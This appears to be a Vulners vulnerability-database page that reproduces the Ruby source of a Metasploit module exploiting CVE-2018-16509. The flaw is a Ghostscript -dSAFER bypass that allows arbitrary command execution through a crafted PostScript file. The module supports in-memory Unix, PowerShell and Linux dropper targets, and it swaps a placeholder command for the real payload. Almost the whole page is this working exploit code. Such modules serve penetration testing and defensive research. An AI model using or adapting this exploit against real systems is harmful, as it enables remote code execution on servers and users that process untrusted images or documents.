Lucene search
K

Ghostscript Failed Restore Command Execution

🗓️ 06 Sep 2018 00:56:32Reported by Tavis Ormandy, wvu <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 57 Views

Ghostscript Failed Restore Command Execution This module exploits a -dSAFER bypass in Ghostscript to execute arbitrary commands by handling a failed restore (grestore) in PostScript to disable LockSafetyParams and avoid invalidaccess. This vulnerability is reachable via libraries such as ImageMagick

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit

  Rank = ExcellentRanking

  PLACEHOLDER_STRING  = 'metasploit'
  PLACEHOLDER_COMMAND = 'echo vulnerable > /dev/tty'

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name'              => 'Ghostscript Failed Restore Command Execution',
      'Description'       => %q{
        This module exploits a -dSAFER bypass in Ghostscript to execute
        arbitrary commands by handling a failed restore (grestore) in
        PostScript to disable LockSafetyParams and avoid invalidaccess.

        This vulnerability is reachable via libraries such as ImageMagick.
      },
      'Author'            => [
        'Tavis Ormandy', # Vuln discovery and exploit
        'wvu'            # Metasploit module
      ],
      'References'        => [
        ['CVE', '2018-16509'],
        ['URL', 'https://seclists.org/oss-sec/2018/q3/142'],
        ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1640']
      ],
      'DisclosureDate'    => '2018-08-21',
      'License'           => MSF_LICENSE,
      'Platform'          => ['unix', 'linux', 'win'],
      'Arch'              => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Privileged'        => false,
      'Targets'           => [
        ['Unix (In-Memory)',
          'Platform'      => 'unix',
          'Arch'          => ARCH_CMD,
          'Type'          => :unix_memory,
          'Payload'       => {
            'Space'       => 4089, # 4096 total
            'DisableNops' => true
          }
        ],
        ['PowerShell (In-Memory)',
          'Platform'      => 'win',
          'Arch'          => [ARCH_X86, ARCH_X64],
          'Type'          => :psh_memory
        ],
        ['Linux (Dropper)',
          'Platform'      => 'linux',
          'Arch'          => [ARCH_X86, ARCH_X64],
          'Type'          => :linux_dropper
        ]
      ],
      'DefaultTarget'     => 0,
      'Notes'             => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [],
        'Reliability' => [],
        'RelatedModules'  => [
          'exploit/unix/fileformat/ghostscript_type_confusion',
          'exploit/unix/fileformat/imagemagick_delegate'
        ]
      }
    ))

    register_options([
      OptString.new('FILENAME', [true, 'Output file', 'msf.ps'])
    ])

    register_advanced_options([
      OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])
    ])
  end

  def exploit
    sploit = template

    # Replace our placeholder string with a random one
    sploit.sub!(PLACEHOLDER_STRING, Rex::Text.rand_text_alphanumeric(8..42))

    # Replace our test payload with the real one
    case target['Type']
    when :unix_memory
      sploit.sub!(PLACEHOLDER_COMMAND, payload.encoded)
    when :psh_memory
      psh = cmd_psh_payload(
        payload.encoded,
        payload.arch.first,
        remove_comspec: true
      )

      # XXX: Payload space applies to the payload, not the PSH command
      if psh.length > targets[0].payload_space
        fail_with(Failure::BadConfig, 'Please choose a smaller payload')
      end

      sploit.sub!(PLACEHOLDER_COMMAND, psh)
    when :linux_dropper
      cmdstager = generate_cmdstager(
        linemax: targets[0].payload_space,
        temp:    datastore['WritableDir']
      ).join(';')

      # XXX: Payload space applies to the payload, not the command stager
      if cmdstager.length > targets[0].payload_space
        fail_with(Failure::BadConfig, 'Please choose a smaller command stager')
      end

      sploit.sub!(PLACEHOLDER_COMMAND, cmdstager)
    end

    file_create(sploit)
  end

  def template
    File.read(File.join(
      Msf::Config.data_directory, 'exploits', 'ghostscript', 'msf.ps'
    ))
  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Apr 2023 09:24Current
7.8High risk
Vulners AI Score7.8
CVSS 29.3
CVSS 37.8
EPSS0.92499
57